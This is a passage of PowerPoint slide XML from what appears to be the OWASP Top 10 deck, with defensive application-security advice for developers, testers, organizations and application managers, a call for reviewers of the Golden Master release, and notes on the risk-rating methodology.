              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. To stay current, come to an </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>AppSec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t> Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>, OWASP Conference Training, or local </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. </a:t>
              </a:r>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dirty="0"/>
                <a:t>Application Security Education</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>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5800" y="1310640"/>
            <a:ext cx="3852337" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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2728485002"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="5657968" cy="456438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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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This is the Golden Master, and once released, only high priority changes and small typos will be fixed.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At this stage, we are asking for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Translations - we have some teams working already, but do reach out to us if you can help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Very close review of the wording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Review diagrams and tables to make sure they are clear and useful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If risk factors (exploitability, prevalence, detectability, impact) are concise and accurate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Vulnerability and Scenarios boxes are clear in meaning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Recommendations must be actionable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Any OWASP or External links are high quality and agree in concept and tone with the Top 10’s content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CWE links must cover the content discussed in each risk. Do we need to add, change, or remove CWEs? Does the CWE need updating? If so, we have a very small window to work with MITRE to make it better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hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a: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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>GM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Master</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>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843563236"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="799767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solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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rPr>
                        <a:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>continuous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-876300" y="3248025"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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kern="1200" dirty="0"/>
                <a:t>Before you start testing, be sure you understand what’s important to spend time on. Priorities come from the threat model, so if you don’t have one, you need to create one before testing. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Consider using </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP ASVS </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>and the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>OWASP Testing Guide </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>as an input and d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>on’t rely on tool vendors to decide what’s importan</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>t for your business. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
                <a:t>Understand the Threat Model</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>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1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Your approach to application security testing must</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>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1000" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Understand Your SDLC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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1000" dirty="0"/>
                <a:t>Choose the simplest, fastest, most accurate technique to verify each requirement. The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP Application Security Verification Standard</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>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Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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Testing Strategies</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>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get to where the essential security of all your applications and APIs is verified continuously.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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kern="1200" baseline="0"/>
                <a:t>Achieving Coverage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200"/>
                <a:t> and Accuracy</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>No matter how good</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>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1000" dirty="0"/>
                <a:t>in the tools development teams are already using, not PDF files.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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40189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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00" b="1"/>
                <a:t>Make Findings Awesome</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What’s Next for Security Testing</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>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3702699696"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="804671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0999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now</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Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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00" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. </a:t>
                      </a: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Arial"/>
                          <a:cs typeface="Arial"/>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Key activities include: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solidFill>
                          <a:schemeClr val="tx2"/>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t>What’s Next for Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997374198"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="274320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p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187610037"/>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6050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Manage the full Application Lifecycle</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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67350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:br>
                        <a:rPr lang="en-AU" sz="900" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We suggest establishing application owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI), to ensure the organization who can sign off risks, and who is responsible for security design, building, testing and deploying application security.</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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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t>What’s Next for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Managers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2428259051"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-76200" y="2286000"/>
          <a:ext cx="7010400" cy="6781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147881228"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="804672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t>It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> Risks, Not Weaknesses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65720">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Although the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>2007</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> and earlier versions of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> focused on identifying the most prevalent “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> the part of people searching for an airtight weakness taxonomy. The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> 2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> clarified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</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Risk Rating methodology for the Top 10 is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</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The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>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dirty="0"/>
                        <a:t>Our methodology includes three</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>likelihood factors for each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>, detectability,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> and ease of exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>) and one</a:t>
                      </a:r>
                      <a:r>
